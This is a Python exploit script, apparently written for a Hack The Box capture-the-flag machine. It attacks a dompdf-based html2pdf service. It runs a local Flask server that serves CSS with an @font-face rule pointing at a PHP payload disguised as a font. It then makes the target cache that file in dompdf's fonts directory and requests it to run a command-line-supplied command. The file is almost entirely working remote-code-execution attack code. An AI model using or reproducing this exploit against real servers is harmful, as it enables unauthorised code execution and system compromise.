import hashlib import os import subprocess import sys import time from flask import Flask, Response import requests, base64 import random from threading import Thread app = Flask(__name__) ttf = b"" md5 = "" with open("exploit_font_template.php", "rb") as file: ttf = file.read() cmd = sys.argv[1].encode() #print(ttf + b"") #exit() got_php = False got_css = False proxy = {'http':'http://127.0.0.1:8080'} @app.route('/css/') def css(name): global md5,got_css got_css = True url = f"http://10.10.16.47/exploit/exploit_font{random.randint(0,9999)}.php" md5 = hashlib.md5(url.encode()).hexdigest() return Response("""@font-face { font-family:'exploitfont'; src:url('""" + url + """'); font-weight:'normal'; font-style:'normal'; }""") @app.route('/exploit/') def exploit(name): global ttf, got_php got_php = True print(f"cmd = {cmd}") return ttf + b"" class Server(Thread): port = 80 cmd = b'' def __int__(self): super(Server, self).__init__() def setIP(self, ip): self.ip = ip def setPort(self, port): self.port = port def setServerObject(self, obj): self.app = obj def run(self) -> None: try: self.app.run(host=self.ip, port=self.port) except Exception as e: print(f"exception: {e}") import logging log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) if __name__ == '__main__': data = {"html":f""} server = Server() server.setIP("10.10.16.47") server.setPort("80") server.setServerObject(app) server.start() time.sleep(0.5) requests.post("http://prd.m.rendering-api.interface.htb/api/html2pdf", json=data, proxies=proxy) while not got_php: pass r = requests.get(f'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_{md5}.php') print(r.text[440:]) subprocess.call(['kill', str(os.getpid())])